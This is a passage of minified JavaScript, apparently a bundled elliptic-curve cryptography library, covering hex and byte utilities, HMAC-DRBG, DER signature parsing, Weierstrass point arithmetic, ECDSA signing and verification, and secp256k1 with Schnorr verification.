                    const t = new Uint8Array(e.length / 2);
                    for(let r = 0; r < t.length; r++){
                        const n = 2 * r, i = e.slice(n, n + 2), o = Number.parseInt(i, 16);
                        if (Number.isNaN(o) || o < 0) throw new Error("invalid byte sequence");
                        t[r] = o;
                    }
                    return t;
                }
                function d(...e) {
                    const t = new Uint8Array(e.reduce((e, t)=>e + t.length, 0));
                    let r = 0;
                    return e.forEach((e)=>{
                        if (!o(e)) throw new Error("Uint8Array expected");
                        t.set(e, r), r += e.length;
                    }), t;
                }
                t.bytesToHex = a, t.numberToHexUnpadded = u, t.hexToNumber = c, t.hexToBytes = l, t.bytesToNumberBE = function(e) {
                    return c(a(e));
                }, t.bytesToNumberLE = function(e) {
                    if (!o(e)) throw new Error("Uint8Array expected");
                    return c(a(Uint8Array.from(e).reverse()));
                }, t.numberToBytesBE = (e, t)=>l(e.toString(16).padStart(2 * t, "0")), t.numberToBytesLE = (e, r)=>(0, t.numberToBytesBE)(e, r).reverse(), t.numberToVarBytesBE = (e)=>l(u(e)), t.ensureBytes = function(e, t, r) {
                    let n;
                    if ("string" == typeof t) try {
                        n = l(t);
                    } catch (r) {
                        throw new Error(`${e} must be valid hex string, got "${t}". Cause: ${r}`);
                    }
                    else {
                        if (!o(t)) throw new Error(`${e} must be hex string or Uint8Array`);
                        n = Uint8Array.from(t);
                    }
                    const i = n.length;
                    if ("number" == typeof r && i !== r) throw new Error(`${e} expected ${r} bytes, got ${i}`);
                    return n;
                }, t.concatBytes = d, t.equalBytes = function(e, t) {
                    if (e.length !== t.length) return !1;
                    for(let r = 0; r < e.length; r++)if (e[r] !== t[r]) return !1;
                    return !0;
                }, t.utf8ToBytes = function(e) {
                    if ("string" != typeof e) throw new Error("utf8ToBytes expected string, got " + typeof e);
                    return (new TextEncoder).encode(e);
                }, t.bitLen = function(e) {
                    let t;
                    for(t = 0; e > r; e >>= n, t += 1);
                    return t;
                }, t.bitGet = (e, t)=>e >> BigInt(t) & n, t.bitSet = (e, t, i)=>e | (i ? n : r) << BigInt(t), t.bitMask = (e)=>(i << BigInt(e - 1)) - n;
                const h = (e)=>new Uint8Array(e), f = (e)=>Uint8Array.from(e);
                t.createHmacDrbg = function(e, t, r) {
                    if ("number" != typeof e || e < 2) throw new Error("hashLen must be a number");
                    if ("number" != typeof t || t < 2) throw new Error("qByteLen must be a number");
                    if ("function" != typeof r) throw new Error("hmacFn must be a function");
                    let n = h(e), i = h(e), o = 0;
                    const s = ()=>{
                        n.fill(1), i.fill(0), o = 0;
                    }, a = (...e)=>r(i, n, ...e), u = (e = h())=>{
                        i = a(f([
                            0
                        ]), e), n = a(), 0 !== e.length && (i = a(f([
                            1
                        ]), e), n = a());
                    }, c = ()=>{
                        if (o++ >= 1e3) throw new Error("drbg: tried 1000 values");
                        let e = 0;
                        const r = [];
                        for(; e < t;){
                            n = a();
                            const t = n.slice();
                            r.push(t), e += n.length;
                        }
                        return d(...r);
                    };
                    return (e, t)=>{
                        let r;
                        for(s(), u(e); !(r = t(c()));)u();
                        return s(), r;
                    };
                };
                const p = {
                    bigint: (e)=>"bigint" == typeof e,
                    function: (e)=>"function" == typeof e,
                    boolean: (e)=>"boolean" == typeof e,
                    string: (e)=>"string" == typeof e,
                    isSafeInteger: (e)=>Number.isSafeInteger(e),
                    array: (e)=>Array.isArray(e),
                    field: (e, t)=>t.Fp.isValid(e),
                    hash: (e)=>"function" == typeof e && Number.isSafeInteger(e.outputLen)
                };
                t.validateObject = function(e, t, r = {}) {
                    const n = (t, r, n)=>{
                        const i = p[r];
                        if ("function" != typeof i) throw new Error(`Invalid validator "${r}", expected function`);
                        const o = e[t];
                        if (!(n && void 0 === o || i(o, e))) throw new Error(`Invalid param ${String(t)}=${o} (${typeof o}), expected ${r}`);
                    };
                    for (const [e, r] of Object.entries(t))n(e, r, !1);
                    for (const [e, t] of Object.entries(r))n(e, t, !0);
                    return e;
                };
            },
            7851: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.mapToCurveSimpleSWU = t.SWUFpSqrtRatio = t.weierstrass = t.weierstrassPoints = t.DER = void 0;
                const n = r(9530), i = r(4323), o = r(4323), s = r(1465), { bytesToNumberBE: a, hexToBytes: u } = i;
                t.DER = {
                    Err: class extends Error {
                        constructor(e = ""){
                            super(e);
                        }
                    },
                    _parseInt (e) {
                        const { Err: r } = t.DER;
                        if (e.length < 2 || 2 !== e[0]) throw new r("Invalid signature integer tag");
                        const n = e[1], i = e.subarray(2, n + 2);
                        if (!n || i.length !== n) throw new r("Invalid signature integer: wrong length");
                        if (128 & i[0]) throw new r("Invalid signature integer: negative");
                        if (0 === i[0] && !(128 & i[1])) throw new r("Invalid signature integer: unnecessary leading zero");
                        return {
                            d: a(i),
                            l: e.subarray(n + 2)
                        };
                    },
                    toSig (e) {
                        const { Err: r } = t.DER, n = "string" == typeof e ? u(e) : e;
                        if (!(n instanceof Uint8Array)) throw new Error("ui8a expected");
                        let i = n.length;
                        if (i < 2 || 48 != n[0]) throw new r("Invalid signature tag");
                        if (n[1] !== i - 2) throw new r("Invalid signature: incorrect length");
                        const { d: o, l: s } = t.DER._parseInt(n.subarray(2)), { d: a, l: c } = t.DER._parseInt(s);
                        if (c.length) throw new r("Invalid signature: left bytes after parsing");
                        return {
                            r: o,
                            s: a
                        };
                    },
                    hexFromSig (e) {
                        const t = (e)=>8 & Number.parseInt(e[0], 16) ? "00" + e : e, r = (e)=>{
                            const t = e.toString(16);
                            return 1 & t.length ? `0${t}` : t;
                        }, n = t(r(e.s)), i = t(r(e.r)), o = n.length / 2, s = i.length / 2, a = r(o), u = r(s);
                        return `30${r(s + o + 4)}02${u}${i}02${a}${n}`;
                    }
                };
                const c = BigInt(0), l = BigInt(1), d = BigInt(2), h = BigInt(3), f = BigInt(4);
                function p(e) {
                    const t = function(e) {
                        const t = (0, s.validateBasic)(e);
                        i.validateObject(t, {
                            a: "field",
                            b: "field"
                        }, {
                            allowedPrivateKeyLengths: "array",
                            wrapPrivateKey: "boolean",
                            isTorsionFree: "function",
                            clearCofactor: "function",
                            allowInfinityPoint: "boolean",
                            fromBytes: "function",
                            toBytes: "function"
                        });
                        const { endo: r, Fp: n, a: o } = t;
                        if (r) {
                            if (!n.eql(o, n.ZERO)) throw new Error("Endomorphism can only be defined for Koblitz curves that have a=0");
                            if ("object" != typeof r || "bigint" != typeof r.beta || "function" != typeof r.splitScalar) throw new Error("Expected endomorphism with beta: bigint and splitScalar: function");
                        }
                        return Object.freeze({
                            ...t
                        });
                    }(e), { Fp: r } = t, a = t.toBytes || ((e, t, n)=>{
                        const o = t.toAffine();
                        return i.concatBytes(Uint8Array.from([
                            4
                        ]), r.toBytes(o.x), r.toBytes(o.y));
                    }), u = t.fromBytes || ((e)=>{
                        const t = e.subarray(1);
                        return {
                            x: r.fromBytes(t.subarray(0, r.BYTES)),
                            y: r.fromBytes(t.subarray(r.BYTES, 2 * r.BYTES))
                        };
                    });
                    function d(e) {
                        const { a: n, b: i } = t, o = r.sqr(e), s = r.mul(o, e);
                        return r.add(r.add(s, r.mul(e, n)), i);
                    }
                    if (!r.eql(r.sqr(t.Gy), d(t.Gx))) throw new Error("bad generator point: equation left != right");
                    function f(e) {
                        return "bigint" == typeof e && c < e && e < t.n;
                    }
                    function p(e) {
                        if (!f(e)) throw new Error("Expected valid bigint: 0 < bigint < curve.n");
                    }
                    function m(e) {
                        const { allowedPrivateKeyLengths: r, nByteLength: s, wrapPrivateKey: a, n: u } = t;
                        if (r && "bigint" != typeof e) {
                            if (e instanceof Uint8Array && (e = i.bytesToHex(e)), "string" != typeof e || !r.includes(e.length)) throw new Error("Invalid key");
                            e = e.padStart(2 * s, "0");
                        }
                        let c;
                        try {
                            c = "bigint" == typeof e ? e : i.bytesToNumberBE((0, o.ensureBytes)("private key", e, s));
                        } catch (t) {
                            throw new Error(`private key must be ${s} bytes, hex or bigint, not ${typeof e}`);
                        }
                        return a && (c = n.mod(c, u)), p(c), c;
                    }
                    const g = new Map;
                    function y(e) {
                        if (!(e instanceof v)) throw new Error("ProjectivePoint expected");
                    }
                    class v {
                        constructor(e, t, n){
                            if (this.px = e, this.py = t, this.pz = n, null == e || !r.isValid(e)) throw new Error("x required");
                            if (null == t || !r.isValid(t)) throw new Error("y required");
                            if (null == n || !r.isValid(n)) throw new Error("z required");
                        }
                        static fromAffine(e) {
                            const { x: t, y: n } = e || {};
                            if (!e || !r.isValid(t) || !r.isValid(n)) throw new Error("invalid affine point");
                            if (e instanceof v) throw new Error("projective point not allowed");
                            const i = (e)=>r.eql(e, r.ZERO);
                            return i(t) && i(n) ? v.ZERO : new v(t, n, r.ONE);
                        }
                        get x() {
                            return this.toAffine().x;
                        }
                        get y() {
                            return this.toAffine().y;
                        }
                        static normalizeZ(e) {
                            const t = r.invertBatch(e.map((e)=>e.pz));
                            return e.map((e, r)=>e.toAffine(t[r])).map(v.fromAffine);
                        }
                        static fromHex(e) {
                            const t = v.fromAffine(u((0, o.ensureBytes)("pointHex", e)));
                            return t.assertValidity(), t;
                        }
                        static fromPrivateKey(e) {
                            return v.BASE.multiply(m(e));
                        }
                        _setWindowSize(e) {
                            this._WINDOW_SIZE = e, g.delete(this);
                        }
                        assertValidity() {
                            if (this.is0()) {
                                if (t.allowInfinityPoint) return;
                                throw new Error("bad point: ZERO");
                            }
                            const { x: e, y: n } = this.toAffine();
                            if (!r.isValid(e) || !r.isValid(n)) throw new Error("bad point: x or y not FE");
                            const i = r.sqr(n), o = d(e);
                            if (!r.eql(i, o)) throw new Error("bad point: equation left != right");
                            if (!this.isTorsionFree()) throw new Error("bad point: not in prime-order subgroup");
                        }
                        hasEvenY() {
                            const { y: e } = this.toAffine();
                            if (r.isOdd) return !r.isOdd(e);
                            throw new Error("Field doesn't support isOdd");
                        }
                        equals(e) {
                            y(e);
                            const { px: t, py: n, pz: i } = this, { px: o, py: s, pz: a } = e, u = r.eql(r.mul(t, a), r.mul(o, i)), c = r.eql(r.mul(n, a), r.mul(s, i));
                            return u && c;
                        }
                        negate() {
                            return new v(this.px, r.neg(this.py), this.pz);
                        }
                        double() {
                            const { a: e, b: n } = t, i = r.mul(n, h), { px: o, py: s, pz: a } = this;
                            let u = r.ZERO, c = r.ZERO, l = r.ZERO, d = r.mul(o, o), f = r.mul(s, s), p = r.mul(a, a), m = r.mul(o, s);
                            return m = r.add(m, m), l = r.mul(o, a), l = r.add(l, l), u = r.mul(e, l), c = r.mul(i, p), c = r.add(u, c), u = r.sub(f, c), c = r.add(f, c), c = r.mul(u, c), u = r.mul(m, u), l = r.mul(i, l), p = r.mul(e, p), m = r.sub(d, p), m = r.mul(e, m), m = r.add(m, l), l = r.add(d, d), d = r.add(l, d), d = r.add(d, p), d = r.mul(d, m), c = r.add(c, d), p = r.mul(s, a), p = r.add(p, p), d = r.mul(p, m), u = r.sub(u, d), l = r.mul(p, f), l = r.add(l, l), l = r.add(l, l), new v(u, c, l);
                        }
                        add(e) {
                            y(e);
                            const { px: n, py: i, pz: o } = this, { px: s, py: a, pz: u } = e;
                            let c = r.ZERO, l = r.ZERO, d = r.ZERO;
                            const f = t.a, p = r.mul(t.b, h);
                            let m = r.mul(n, s), g = r.mul(i, a), b = r.mul(o, u), E = r.add(n, i), A = r.add(s, a);
                            E = r.mul(E, A), A = r.add(m, g), E = r.sub(E, A), A = r.add(n, o);
                            let _ = r.add(s, u);
                            return A = r.mul(A, _), _ = r.add(m, b), A = r.sub(A, _), _ = r.add(i, o), c = r.add(a, u), _ = r.mul(_, c), c = r.add(g, b), _ = r.sub(_, c), d = r.mul(f, A), c = r.mul(p, b), d = r.add(c, d), c = r.sub(g, d), d = r.add(g, d), l = r.mul(c, d), g = r.add(m, m), g = r.add(g, m), b = r.mul(f, b), A = r.mul(p, A), g = r.add(g, b), b = r.sub(m, b), b = r.mul(f, b), A = r.add(A, b), m = r.mul(g, A), l = r.add(l, m), m = r.mul(_, A), c = r.mul(E, c), c = r.sub(c, m), m = r.mul(E, g), d = r.mul(_, d), d = r.add(d, m), new v(c, l, d);
                        }
                        subtract(e) {
                            return this.add(e.negate());
                        }
                        is0() {
                            return this.equals(v.ZERO);
                        }
                        wNAF(e) {
                            return E.wNAFCached(this, g, e, (e)=>{
                                const t = r.invertBatch(e.map((e)=>e.pz));
                                return e.map((e, r)=>e.toAffine(t[r])).map(v.fromAffine);
                            });
                        }
                        multiplyUnsafe(e) {
                            const n = v.ZERO;
                            if (e === c) return n;
                            if (p(e), e === l) return this;
                            const { endo: i } = t;
                            if (!i) return E.unsafeLadder(this, e);
                            let { k1neg: o, k1: s, k2neg: a, k2: u } = i.splitScalar(e), d = n, h = n, f = this;
                            for(; s > c || u > c;)s & l && (d = d.add(f)), u & l && (h = h.add(f)), f = f.double(), s >>= l, u >>= l;
                            return o && (d = d.negate()), a && (h = h.negate()), h = new v(r.mul(h.px, i.beta), h.py, h.pz), d.add(h);
                        }
                        multiply(e) {
                            p(e);
                            let n, i, o = e;
                            const { endo: s } = t;
                            if (s) {
                                const { k1neg: e, k1: t, k2neg: a, k2: u } = s.splitScalar(o);
                                let { p: c, f: l } = this.wNAF(t), { p: d, f: h } = this.wNAF(u);
                                c = E.constTimeNegate(e, c), d = E.constTimeNegate(a, d), d = new v(r.mul(d.px, s.beta), d.py, d.pz), n = c.add(d), i = l.add(h);
                            } else {
                                const { p: e, f: t } = this.wNAF(o);
                                n = e, i = t;
                            }
                            return v.normalizeZ([
                                n,
                                i
                            ])[0];
                        }
                        multiplyAndAddUnsafe(e, t, r) {
                            const n = v.BASE, i = (e, t)=>t !== c && t !== l && e.equals(n) ? e.multiply(t) : e.multiplyUnsafe(t), o = i(this, t).add(i(e, r));
                            return o.is0() ? void 0 : o;
                        }
                        toAffine(e) {
                            const { px: t, py: n, pz: i } = this, o = this.is0();
                            null == e && (e = o ? r.ONE : r.inv(i));
                            const s = r.mul(t, e), a = r.mul(n, e), u = r.mul(i, e);
                            if (o) return {
                                x: r.ZERO,
                                y: r.ZERO
                            };
                            if (!r.eql(u, r.ONE)) throw new Error("invZ was invalid");
                            return {
                                x: s,
                                y: a
                            };
                        }
                        isTorsionFree() {
                            const { h: e, isTorsionFree: r } = t;
                            if (e === l) return !0;
                            if (r) return r(v, this);
                            throw new Error("isTorsionFree() has not been declared for the elliptic curve");
                        }
                        clearCofactor() {
                            const { h: e, clearCofactor: r } = t;
                            return e === l ? this : r ? r(v, this) : this.multiplyUnsafe(t.h);
                        }
                        toRawBytes(e = !0) {
                            return this.assertValidity(), a(v, this, e);
                        }
                        toHex(e = !0) {
                            return i.bytesToHex(this.toRawBytes(e));
                        }
                    }
                    v.BASE = new v(t.Gx, t.Gy, r.ONE), v.ZERO = new v(r.ZERO, r.ONE, r.ZERO);
                    const b = t.nBitLength, E = (0, s.wNAF)(v, t.endo ? Math.ceil(b / 2) : b);
                    return {
                        CURVE: t,
                        ProjectivePoint: v,
                        normPrivateKeyToScalar: m,
                        weierstrassEquation: d,
                        isWithinCurveOrder: f
                    };
                }
                function m(e, t) {
                    const r = e.ORDER;
                    let n = c;
                    for(let e = r - l; e % d === c; e /= d)n += l;
                    const i = n, o = (r - l) / d ** i, s = (o - l) / d, a = d ** i - l, u = d ** (i - l), p = e.pow(t, o), m = e.pow(t, (o + l) / d);
                    let g = (t, r)=>{
                        let n = p, o = e.pow(r, a), c = e.sqr(o);
                        c = e.mul(c, r);
                        let h = e.mul(t, c);
                        h = e.pow(h, s), h = e.mul(h, o), o = e.mul(h, r), c = e.mul(h, t);
                        let f = e.mul(c, o);
                        h = e.pow(f, u);
                        let g = e.eql(h, e.ONE);
                        o = e.mul(c, m), h = e.mul(f, n), c = e.cmov(o, c, g), f = e.cmov(h, f, g);
                        for(let t = i; t > l; t--){
                            let r = d ** (t - d), i = e.pow(f, r);
                            const s = e.eql(i, e.ONE);
                            o = e.mul(c, n), n = e.mul(n, n), i = e.mul(f, n), c = e.cmov(o, c, s), f = e.cmov(i, f, s);
                        }
                        return {
                            isValid: g,
                            value: c
                        };
                    };
                    if (e.ORDER % f === h) {
                        const r = (e.ORDER - h) / f, n = e.sqrt(e.neg(t));
                        g = (t, i)=>{
                            let o = e.sqr(i);
                            const s = e.mul(t, i);
                            o = e.mul(o, s);
                            let a = e.pow(o, r);
                            a = e.mul(a, s);
                            const u = e.mul(a, n), c = e.mul(e.sqr(a), i), l = e.eql(c, t);
                            return {
                                isValid: l,
                                value: e.cmov(u, a, l)
                            };
                        };
                    }
                    return g;
                }
                t.weierstrassPoints = p, t.weierstrass = function(e) {
                    const r = function(e) {
                        const t = (0, s.validateBasic)(e);
                        return i.validateObject(t, {
                            hash: "hash",
                            hmac: "function",
                            randomBytes: "function"
                        }, {
                            bits2int: "function",
                            bits2int_modN: "function",
                            lowS: "boolean"
                        }), Object.freeze({
                            lowS: !0,
                            ...t
                        });
                    }(e), { Fp: a, n: u } = r, d = a.BYTES + 1, h = 2 * a.BYTES + 1;
                    function f(e) {
                        return n.mod(e, u);
                    }
                    function m(e) {
                        return n.invert(e, u);
                    }
                    const { ProjectivePoint: g, normPrivateKeyToScalar: y, weierstrassEquation: v, isWithinCurveOrder: b } = p({
                        ...r,
                        toBytes (e, t, r) {
                            const n = t.toAffine(), o = a.toBytes(n.x), s = i.concatBytes;
                            return r ? s(Uint8Array.from([
                                t.hasEvenY() ? 2 : 3
                            ]), o) : s(Uint8Array.from([
                                4
                            ]), o, a.toBytes(n.y));
                        },
                        fromBytes (e) {
                            const t = e.length, r = e[0], n = e.subarray(1);
                            if (t !== d || 2 !== r && 3 !== r) {
                                if (t === h && 4 === r) return {
                                    x: a.fromBytes(n.subarray(0, a.BYTES)),
                                    y: a.fromBytes(n.subarray(a.BYTES, 2 * a.BYTES))
                                };
                                throw new Error(`Point of length ${t} was invalid. Expected ${d} compressed bytes or ${h} uncompressed bytes`);
                            }
                            {
                                const e = i.bytesToNumberBE(n);
                                if (!(c < (o = e) && o < a.ORDER)) throw new Error("Point is not on curve");
                                const t = v(e);
                                let s = a.sqrt(t);
                                return 1 == (1 & r) != ((s & l) === l) && (s = a.neg(s)), {
                                    x: e,
                                    y: s
                                };
                            }
                            var o;
                        }
                    }), E = (e)=>i.bytesToHex(i.numberToBytesBE(e, r.nByteLength));
                    function A(e) {
                        return e > u >> l;
                    }
                    const _ = (e, t, r)=>i.bytesToNumberBE(e.slice(t, r));
                    class w {
                        constructor(e, t, r){
                            this.r = e, this.s = t, this.recovery = r, this.assertValidity();
                        }
                        static fromCompact(e) {
                            const t = r.nByteLength;
                            return e = (0, o.ensureBytes)("compactSignature", e, 2 * t), new w(_(e, 0, t), _(e, t, 2 * t));
                        }
                        static fromDER(e) {
                            const { r: r, s: n } = t.DER.toSig((0, o.ensureBytes)("DER", e));
                            return new w(r, n);
                        }
                        assertValidity() {
                            if (!b(this.r)) throw new Error("r must be 0 < r < CURVE.n");
                            if (!b(this.s)) throw new Error("s must be 0 < s < CURVE.n");
                        }
                        addRecoveryBit(e) {
                            return new w(this.r, this.s, e);
                        }
                        recoverPublicKey(e) {
                            const { r: t, s: n, recovery: i } = this, s = S((0, o.ensureBytes)("msgHash", e));
                            if (null == i || ![
                                0,
                                1,
                                2,
                                3
                            ].includes(i)) throw new Error("recovery id invalid");
                            const u = 2 === i || 3 === i ? t + r.n : t;
                            if (u >= a.ORDER) throw new Error("recovery id 2 or 3 invalid");
                            const c = 0 == (1 & i) ? "02" : "03", l = g.fromHex(c + E(u)), d = m(u), h = f(-s * d), p = f(n * d), y = g.BASE.multiplyAndAddUnsafe(l, h, p);
                            if (!y) throw new Error("point at infinify");
                            return y.assertValidity(), y;
                        }
                        hasHighS() {
                            return A(this.s);
                        }
                        normalizeS() {
                            return this.hasHighS() ? new w(this.r, f(-this.s), this.recovery) : this;
                        }
                        toDERRawBytes() {
                            return i.hexToBytes(this.toDERHex());
                        }
                        toDERHex() {
                            return t.DER.hexFromSig({
                                r: this.r,
                                s: this.s
                            });
                        }
                        toCompactRawBytes() {
                            return i.hexToBytes(this.toCompactHex());
                        }
                        toCompactHex() {
                            return E(this.r) + E(this.s);
                        }
                    }
                    const T = {
                        isValidPrivateKey (e) {
                            try {
                                return y(e), !0;
                            } catch (e) {
                                return !1;
                            }
                        },
                        normPrivateKeyToScalar: y,
                        randomPrivateKey: ()=>{
                            const e = r.randomBytes(a.BYTES + 8), t = n.hashToPrivateScalar(e, u);
                            return i.numberToBytesBE(t, r.nByteLength);
                        },
                        precompute: (e = 8, t = g.BASE)=>(t._setWindowSize(e), t.multiply(BigInt(3)), t)
                    };
                    function R(e) {
                        const t = e instanceof Uint8Array, r = "string" == typeof e, n = (t || r) && e.length;
                        return t ? n === d || n === h : r ? n === 2 * d || n === 2 * h : e instanceof g;
                    }
                    const I = r.bits2int || function(e) {
                        const t = i.bytesToNumberBE(e), n = 8 * e.length - r.nBitLength;
                        return n > 0 ? t >> BigInt(n) : t;
                    }, S = r.bits2int_modN || function(e) {
                        return f(I(e));
                    }, P = i.bitMask(r.nBitLength);
                    function O(e) {
                        if ("bigint" != typeof e) throw new Error("bigint expected");
                        if (!(c <= e && e < P)) throw new Error(`bigint expected < 2^${r.nBitLength}`);
                        return i.numberToBytesBE(e, r.nByteLength);
                    }
                    const x = {
                        lowS: r.lowS,
                        prehash: !1
                    }, M = {
                        lowS: r.lowS,
                        prehash: !1
                    };
                    return g.BASE._setWindowSize(8), {
                        CURVE: r,
                        getPublicKey: function(e, t = !0) {
                            return g.fromPrivateKey(e).toRawBytes(t);
                        },
                        getSharedSecret: function(e, t, r = !0) {
                            if (R(e)) throw new Error("first arg must be private key");
                            if (!R(t)) throw new Error("second arg must be public key");
                            return g.fromHex(t).multiply(y(e)).toRawBytes(r);
                        },
                        sign: function(e, t, n = x) {
                            const { seed: s, k2sig: u } = function(e, t, n = x) {
                                if ([
                                    "recovered",
                                    "canonical"
                                ].some((e)=>e in n)) throw new Error("sign() legacy options not supported");
                                const { hash: s, randomBytes: u } = r;
                                let { lowS: d, prehash: h, extraEntropy: p } = n;
                                null == d && (d = !0), e = (0, o.ensureBytes)("msgHash", e), h && (e = (0, o.ensureBytes)("prehashed msgHash", s(e)));
                                const v = S(e), E = y(t), _ = [
                                    O(E),
                                    O(v)
                                ];
                                if (null != p) {
                                    const e = !0 === p ? u(a.BYTES) : p;
                                    _.push((0, o.ensureBytes)("extraEntropy", e, a.BYTES));
                                }
                                const T = i.concatBytes(..._), R = v;
                                return {
                                    seed: T,
                                    k2sig: function(e) {
                                        const t = I(e);
                                        if (!b(t)) return;
                                        const r = m(t), n = g.BASE.multiply(t).toAffine(), i = f(n.x);
                                        if (i === c) return;
                                        const o = f(r * f(R + i * E));
                                        if (o === c) return;
                                        let s = (n.x === i ? 0 : 2) | Number(n.y & l), a = o;
                                        return d && A(o) && (a = function(e) {
                                            return A(e) ? f(-e) : e;
                                        }(o), s ^= 1), new w(i, a, s);
                                    }
                                };
                            }(e, t, n);
                            return i.createHmacDrbg(r.hash.outputLen, r.nByteLength, r.hmac)(s, u);
                        },
                        verify: function(e, n, i, s = M) {
                            const a = e;
                            if (n = (0, o.ensureBytes)("msgHash", n), i = (0, o.ensureBytes)("publicKey", i), "strict" in s) throw new Error("options.strict was renamed to lowS");
                            const { lowS: u, prehash: c } = s;
                            let l, d;
                            try {
                                if ("string" == typeof a || a instanceof Uint8Array) try {
                                    l = w.fromDER(a);
                                } catch (e) {
                                    if (!(e instanceof t.DER.Err)) throw e;
                                    l = w.fromCompact(a);
                                }
                                else {
                                    if ("object" != typeof a || "bigint" != typeof a.r || "bigint" != typeof a.s) throw new Error("PARSE");
                                    {
                                        const { r: e, s: t } = a;
                                        l = new w(e, t);
                                    }
                                }
                                d = g.fromHex(i);
                            } catch (e) {
                                if ("PARSE" === e.message) throw new Error("signature must be Signature instance, Uint8Array or hex string");
                                return !1;
                            }
                            if (u && l.hasHighS()) return !1;
                            c && (n = r.hash(n));
                            const { r: h, s: p } = l, y = S(n), v = m(p), b = f(y * v), E = f(h * v), A = g.BASE.multiplyAndAddUnsafe(d, b, E)?.toAffine();
                            return !!A && f(A.x) === h;
                        },
                        ProjectivePoint: g,
                        Signature: w,
                        utils: T
                    };
                }, t.SWUFpSqrtRatio = m, t.mapToCurveSimpleSWU = function(e, t) {
                    if (n.validateField(e), !e.isValid(t.A) || !e.isValid(t.B) || !e.isValid(t.Z)) throw new Error("mapToCurveSimpleSWU: invalid opts");
                    const r = m(e, t.Z);
                    if (!e.isOdd) throw new Error("Fp.isOdd is not implemented!");
                    return (n)=>{
                        let i, o, s, a, u, c, l, d;
                        i = e.sqr(n), i = e.mul(i, t.Z), o = e.sqr(i), o = e.add(o, i), s = e.add(o, e.ONE), s = e.mul(s, t.B), a = e.cmov(t.Z, e.neg(o), !e.eql(o, e.ZERO)), a = e.mul(a, t.A), o = e.sqr(s), c = e.sqr(a), u = e.mul(c, t.A), o = e.add(o, u), o = e.mul(o, s), c = e.mul(c, a), u = e.mul(c, t.B), o = e.add(o, u), l = e.mul(i, s);
                        const { isValid: h, value: f } = r(o, c);
                        d = e.mul(i, n), d = e.mul(d, f), l = e.cmov(l, s, h), d = e.cmov(d, f, h);
                        const p = e.isOdd(n) === e.isOdd(d);
                        return d = e.cmov(e.neg(d), d, p), l = e.div(l, a), {
                            x: l,
                            y: d
                        };
                    };
                };
            },
            8358: (e, t, r)=>{
                "use strict";
                var n;
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.encodeToCurve = t.hashToCurve = t.schnorr = t.secp256k1 = void 0;
                const i = r(6053), o = r(64), s = r(9530), a = r(7851), u = r(4323), c = r(1322), l = r(5887), d = BigInt("0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f"), h = BigInt("0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141"), f = BigInt(1), p = BigInt(2), m = (e, t)=>(e + t / p) / t;
                function g(e) {
                    const t = d, r = BigInt(3), n = BigInt(6), i = BigInt(11), o = BigInt(22), a = BigInt(23), u = BigInt(44), c = BigInt(88), l = e * e * e % t, h = l * l * e % t, f = (0, s.pow2)(h, r, t) * h % t, m = (0, s.pow2)(f, r, t) * h % t, g = (0, s.pow2)(m, p, t) * l % t, v = (0, s.pow2)(g, i, t) * g % t, b = (0, s.pow2)(v, o, t) * v % t, E = (0, s.pow2)(b, u, t) * b % t, A = (0, s.pow2)(E, c, t) * E % t, _ = (0, s.pow2)(A, u, t) * b % t, w = (0, s.pow2)(_, r, t) * h % t, T = (0, s.pow2)(w, a, t) * v % t, R = (0, s.pow2)(T, n, t) * l % t, I = (0, s.pow2)(R, p, t);
                    if (!y.eql(y.sqr(I), e)) throw new Error("Cannot find square root");
                    return I;
                }
                const y = (0, s.Field)(d, void 0, void 0, {
                    sqrt: g
                });
                t.secp256k1 = (0, l.createCurve)({
                    a: BigInt(0),
                    b: BigInt(7),
                    Fp: y,
                    n: h,
                    Gx: BigInt("55066263022277343669578718895168534326250603453777594175500187360389116729240"),
                    Gy: BigInt("32670510020758816978083085130507043184471273380659243275938904335757337482424"),
                    h: BigInt(1),
                    lowS: !0,
                    endo: {
                        beta: BigInt("0x7ae96a2b657c07106e64479eac3434e99cf0497512f58995c1396c28719501ee"),
                        splitScalar: (e)=>{
                            const t = h, r = BigInt("0x3086d221a7d46bcde86c90e49284eb15"), n = -f * BigInt("0xe4437ed6010e88286f547fa90abfe4c3"), i = BigInt("0x114ca50f7a8e2f3f657c1108d9d44cfd8"), o = r, a = BigInt("0x100000000000000000000000000000000"), u = m(o * e, t), c = m(-n * e, t);
                            let l = (0, s.mod)(e - u * r - c * i, t), d = (0, s.mod)(-u * n - c * o, t);
                            const p = l > a, g = d > a;
                            if (p && (l = t - l), g && (d = t - d), l > a || d > a) throw new Error("splitScalar: Endomorphism failed, k=" + e);
                            return {
                                k1neg: p,
                                k1: l,
                                k2neg: g,
                                k2: d
                            };
                        }
                    }
                }, i.sha256);
                const v = BigInt(0), b = (e)=>"bigint" == typeof e && v < e && e < d, E = {};
                function A(e, ...t) {
                    let r = E[e];
                    if (void 0 === r) {
                        const t = (0, i.sha256)(Uint8Array.from(e, (e)=>e.charCodeAt(0)));
                        r = (0, u.concatBytes)(t, t), E[e] = r;
                    }
                    return (0, i.sha256)((0, u.concatBytes)(r, ...t));
                }
                const _ = (e)=>e.toRawBytes(!0).slice(1), w = (e)=>(0, u.numberToBytesBE)(e, 32), T = (e)=>(0, s.mod)(e, d), R = (e)=>(0, s.mod)(e, h), I = t.secp256k1.ProjectivePoint;
                function S(e) {
                    let r = t.secp256k1.utils.normPrivateKeyToScalar(e), n = I.fromPrivateKey(r);
                    return {
                        scalar: n.hasEvenY() ? r : R(-r),
                        bytes: _(n)
                    };
                }
                function P(e) {
                    if (!b(e)) throw new Error("bad x: need 0 < x < p");
                    const t = T(e * e);
                    let r = g(T(t * e + BigInt(7)));
                    r % p !== v && (r = T(-r));
                    const n = new I(e, r, f);
                    return n.assertValidity(), n;
                }
                function O(...e) {
                    return R((0, u.bytesToNumberBE)(A("BIP0340/challenge", ...e)));
                }
                function x(e, t, r) {
                    const n = (0, u.ensureBytes)("signature", e, 64), i = (0, u.ensureBytes)("message", t), o = (0, u.ensureBytes)("publicKey", r, 32);
                    try {
                        const e = P((0, u.bytesToNumberBE)(o)), t = (0, u.bytesToNumberBE)(n.subarray(0, 32));
                        if (!b(t)) return !1;
                        const r = (0, u.bytesToNumberBE)(n.subarray(32, 64));
                        if (!("bigint" == typeof (l = r) && v < l && l < h)) return !1;
                        const d = O(w(t), _(e), i), f = (s = e, a = r, c = R(-d), I.BASE.multiplyAndAddUnsafe(s, a, c));
